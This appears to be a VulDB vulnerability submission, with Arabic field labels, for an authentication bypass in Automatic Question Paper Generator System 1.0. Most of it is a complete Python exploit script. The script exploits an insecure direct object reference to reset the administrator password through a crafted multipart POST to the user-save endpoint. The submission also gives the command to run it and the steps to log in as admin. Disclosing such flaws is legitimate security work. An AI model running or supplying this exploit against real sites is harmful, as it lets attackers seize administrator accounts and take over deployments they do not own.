| عنوان | Automatic Question Paper Generator System 1.0 - Authentication Bypass |
|---|
| الوصف | The Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password by insecure direct object reference (IDOR) attack, for this reason, the attacker can have full access to the administrator account by resetting your password.
* Steps to Reproduce:
1. Create a python file and paste this code and save:
#######################################################
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse
def banner():
print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')
def main():
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}
boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)
headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}
r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
if '1' in r.text:
print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)
parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()
#######################################################
2. Run the command:
python3 exploit.py -u http://target.com/aqpg/ -p newpassword
3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and login using the admin:newpassword credentials.
You will be logged into the administrator account. |
|---|
| المصدر | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| المستخدم | mrempy (UID 24379) |
|---|
| ارسال | 05/03/2022 06:13 PM (4 سنوات منذ) |
|---|
| الاعتدال | 13/03/2022 12:12 PM (8 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 194839 [Automatic Question Paper Generator 1.0 تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|